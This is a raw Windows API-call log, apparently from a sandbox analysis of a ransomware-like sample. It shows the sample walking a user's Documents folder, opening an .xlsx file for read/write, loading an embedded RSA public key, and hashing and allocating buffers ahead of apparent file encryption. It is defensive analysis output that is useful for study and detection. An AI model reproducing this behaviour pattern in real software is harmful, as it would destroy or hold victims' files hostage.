RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.262] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\qGqm\\") returned="qGqm\\" [0192.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.262] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0192.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41a40 [0192.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.263] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41a40 | out: hHeap=0x6a0000) returned 1 [0192.263] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.263] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.264] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.264] PathFindFileNameW (pszPath="") returned="" [0192.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.264] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\qGqm\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\qgqm\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4184a0, ftCreationTime.dwHighDateTime=0x1d89b04, ftLastAccessTime.dwLowDateTime=0x7328e620, ftLastAccessTime.dwHighDateTime=0x1d89d59, ftLastWriteTime.dwLowDateTime=0x7328e620, ftLastWriteTime.dwHighDateTime=0x1d89d59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0192.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.267] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4184a0, ftCreationTime.dwHighDateTime=0x1d89b04, ftLastAccessTime.dwLowDateTime=0x7328e620, ftLastAccessTime.dwHighDateTime=0x1d89d59, ftLastWriteTime.dwLowDateTime=0x7328e620, ftLastWriteTime.dwHighDateTime=0x1d89d59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.268] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5be9dee0, ftCreationTime.dwHighDateTime=0x1d8a049, ftLastAccessTime.dwLowDateTime=0xa18a4b70, ftLastAccessTime.dwHighDateTime=0x1d8a3db, ftLastWriteTime.dwLowDateTime=0xa18a4b70, ftLastWriteTime.dwHighDateTime=0x1d8a3db, nFileSizeHigh=0x0, nFileSizeLow=0xc650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B_1kIj6HPFfLN8h7Oij.xlsx", cAlternateFileName="B_1KIJ~1.XLS")) returned 1 [0192.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.268] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\qGqm\\B_1kIj6HPFfLN8h7Oij.xlsx") returned=".xlsx" [0192.268] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\qGqm\\B_1kIj6HPFfLN8h7Oij.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\qgqm\\b_1kij6hpffln8h7oij.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.269] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=50768) returned 1 [0192.269] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.271] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc62a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.271] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.273] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.273] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xc650, lpOverlapped=0x0) returned 1 [0192.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.274] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0192.276] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.276] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.276] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.276] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.276] GetLastError () returned 0x0 [0192.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.276] GetLastError () returned 0x0 [0192.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.276] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.276] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0192.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.277] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.277] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.277] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc650) returned 0x2d45778 [0192.278] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41a40 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41a88 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.279] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d18 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39d00 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.280] 